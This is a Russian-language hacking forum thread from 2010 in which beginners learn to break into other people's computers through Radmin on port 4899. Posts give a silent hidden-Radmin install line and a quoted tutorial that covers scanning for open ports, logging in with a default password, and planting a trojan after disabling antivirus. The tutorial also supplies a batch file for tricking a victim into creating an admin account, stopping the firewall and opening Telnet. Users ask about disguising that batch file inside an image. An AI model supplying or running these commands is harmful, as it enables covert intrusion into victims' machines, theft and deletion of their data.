Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Взлом компьютеров
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Взлом компьютеров Проникновение на удаленные компьютеры и серверы. Получение доступа к чужой системе.

Ответ
 
Опции темы
Старый 24.09.2010, 12:07   #31
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
Цитата:
Сообщение от sergeiru02 Посмотреть сообщение
Radmin Viewer удалён с депозита.И где теперь его искать
Это потеря потерь
К гуглу обратиться не пробовали?

Скачать Radmin Viewer

HackersOfTrue! Хакеры правды! (C) Kanaris

Последний раз редактировалось SoftHack, 24.09.2010 в 17:10.
SoftHack вне форума   Ответить с цитированием
Старый 07.10.2010, 16:04   #32
xxTIMURxx
newbie 
 
Аватар для xxTIMURxx
 
Регистрация: 07.10.2010
Сообщений: 19
Вес репутации: 1 xxTIMURxx новичек
Депозит: 0$
Вы сказали Спасибо: 3
Поблагодарили 2 раз(а) в 1 сообщении
а как мне сменить пароль в радмине чет в настройках я ненашол... а также пользователя поставить. а то в некоторых видел лог и пас нужен был) тема клёвая. и еще я вот пошлю бат который тут в теме указали другу примеру у него порт 4899 или какой там откроется сам и все тип топ или тока тем у кого такой порт я смогу??

добавлено через 4 минуты
и еще еси я тот батник с джойнером каким нить к примеру к картинке или текстку приклею будет работать норм?

Последний раз редактировалось xxTIMURxx, 07.10.2010 в 16:09. Причина: Добавлено сообщение
xxTIMURxx вне форума   Ответить с цитированием
Старый 07.10.2010, 17:44   #33
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
Цитата:
Сообщение от xxTIMURxx Посмотреть сообщение
а как мне сменить пароль в радмине чет в настройках я ненашол... а также пользователя поставить. а то в некоторых видел лог и пас нужен был) тема клёвая. и еще я вот пошлю бат который тут в теме указали другу примеру у него порт 4899 или какой там откроется сам и все тип топ или тока тем у кого такой порт я смогу??

добавлено через 4 минуты
и еще еси я тот батник с джойнером каким нить к примеру к картинке или текстку приклею будет работать норм?
Строка с паролем:
Код:
%/svchost.exe" /silence /pass:ваш_пароль /port:ваш_порт(по умолчанию 4899) /save
логин "поставить" нельзя, т.к. это поле имеется только в новых версиях радмина (или можешь поискать скрытого радмина версии 3.* )
Одним батом ничего не сделаешь, качай архив с самим радмином, приконнектиться сможешь к порту который пропишешь в настройках

HackersOfTrue! Хакеры правды! (C) Kanaris
SoftHack вне форума   Ответить с цитированием
Старый 07.10.2010, 19:52   #34
xxTIMURxx
newbie 
 
Аватар для xxTIMURxx
 
Регистрация: 07.10.2010
Сообщений: 19
Вес репутации: 1 xxTIMURxx новичек
Депозит: 0$
Вы сказали Спасибо: 3
Поблагодарили 2 раз(а) в 1 сообщении
SoftHack не я не в батнике сменить пароль)) я про прогу радмина так как сами говорили по умолчанию 12345678 так получается у меня также стоит сейчас? и вот как сменить его чтобы меня случайно не взломали))) в настройках смотрю найти немогу...
xxTIMURxx вне форума   Ответить с цитированием
Старый 08.10.2010, 15:43   #35
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
хз как изменить, можно отключить\приостановить службу радмина

HackersOfTrue! Хакеры правды! (C) Kanaris
SoftHack вне форума   Ответить с цитированием
Старый 09.10.2010, 21:57   #36
MrBear
newbie 
 
Регистрация: 09.10.2010
Сообщений: 1
Вес репутации: 0 MrBear новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
я все сдела как ты говорила но он требует имя и пароль пароль я знаю 12345678,а вот с паролем сложнее помоги а?
MrBear вне форума   Ответить с цитированием
Старый 09.10.2010, 22:06   #37
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
Цитата:
Сообщение от MrBear Посмотреть сообщение
я все сдела как ты говорила но он требует имя и пароль пароль я знаю 12345678,а вот с паролем сложнее помоги а?
пить меньше надо
Цитата:
пароль я знаю 12345678
Цитата:
а вот с паролем сложнее

HackersOfTrue! Хакеры правды! (C) Kanaris
SoftHack вне форума   Ответить с цитированием
Благодарности: 2
Старый 26.10.2010, 16:46   #38
mrHeXPert
newbie 
 
Регистрация: 25.10.2010
Сообщений: 14
Вес репутации: 1 mrHeXPert новичек
Депозит: 0$
Вы сказали Спасибо: 3
Поблагодарили 0 раз(а) в 0 сообщениях
У меня чето не получается кинул другу этот .bat узнал айпи ток не постоянный.Пытаюсь приконектится в Radmin пишет что не удолось соединится с сервером.Почему так?

добавлено через 8 минут
аааа Если на другом компе н стоит радмин то нечего не получется?

Последний раз редактировалось mrHeXPert, 26.10.2010 в 16:54. Причина: Добавлено сообщение
mrHeXPert вне форума   Ответить с цитированием
Старый 26.10.2010, 18:46   #39
Demon
expert 
 
Аватар для Demon
 
Регистрация: 28.05.2008
Сообщений: 2,989
Вес репутации: 82 Demon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионалDemon профессионал
Депозит: 0$
Вы сказали Спасибо: 103
Поблагодарили 717 раз(а) в 460 сообщениях
Цитата:
Сообщение от mrHeXPert Посмотреть сообщение
аааа Если на другом компе н стоит радмин то нечего не получется?
да


Demon вне форума   Ответить с цитированием
Старый 31.10.2010, 12:23   #40
Наталья Дроздова
newbie 
 
Аватар для Наталья Дроздова
 
Регистрация: 17.10.2010
Сообщений: 6
Вес репутации: 0 Наталья Дроздова новичек
Депозит: 0$
Вы сказали Спасибо: 9
Поблагодарили 0 раз(а) в 0 сообщениях
Цитата:
Сообщение от m33 Посмотреть сообщение
Приветствую всех на этом форуме!

Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).

Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)

Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Пример:



Сохраняем и открываем, видим следущее:



После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.

Открываем радмин, жмем на желтую молнию и вводим айпи.



Жмем "Ок", и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдет.

Если пароль подойдет, видим что то вроде этого:



Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.

Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.

Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.

Для начала нам нужно написать батник и кинуть его жертве, чтобы он/она открыла его. Ах да, что такое батник и как его создать спросите вы.. Bat файлы - это обычные текстовые файлы, содержащие наборы команд интерпритатора и имеющие расширение bat. Для того чтобы создать такой файл, открываем блокнот, нажимаем "Сохранить как", выбираем "Все файлы" и пишем название файла, после которого нужно обязательно поставить .bat. Например: 123.bat.

В батник пишем следующее:

Код:
chcp 1251
net user root mypass /add
net localgroup Администраторы root /add
net localgroup Administrators root /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=4899 sec=-NTLM
net start Telnet
И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)

Узнаем айпи того, к кому хотите проникнуть в комп, как узнать - выхоит за рамки этой статьи.

Дальше коннектимся, вводим логин - root, а пароль - mypass, ну собственно и все.

Удачного хека..

(C) m33.
добавлено через 2 минуты
я могу через почтовый ящик узнать его компьютер.

Последний раз редактировалось Наталья Дроздова, 31.10.2010 в 12:25. Причина: Добавлено сообщение
Наталья Дроздова вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 06:39.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru